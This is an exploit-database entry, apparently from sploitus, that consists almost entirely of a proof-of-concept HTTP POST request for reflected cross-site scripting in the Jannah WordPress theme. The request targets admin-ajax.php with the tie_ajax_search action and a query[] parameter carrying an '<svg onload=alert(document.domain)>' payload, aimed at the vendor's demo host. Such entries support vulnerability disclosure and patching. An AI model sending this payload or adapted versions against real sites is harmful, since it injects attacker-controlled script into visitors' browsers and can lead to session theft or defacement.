Share
## https://sploitus.com/exploit?id=WPEX-ID:FBA9F010-1202-4EEA-A6F5-78865C084153
POST /demo/wp-admin/admin-ajax.php HTTP/1.1
Host: jannah.tielabs.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 66
Connection: close

action=tie_ajax_search&query[]=<svg+onload=alert(document.domain)>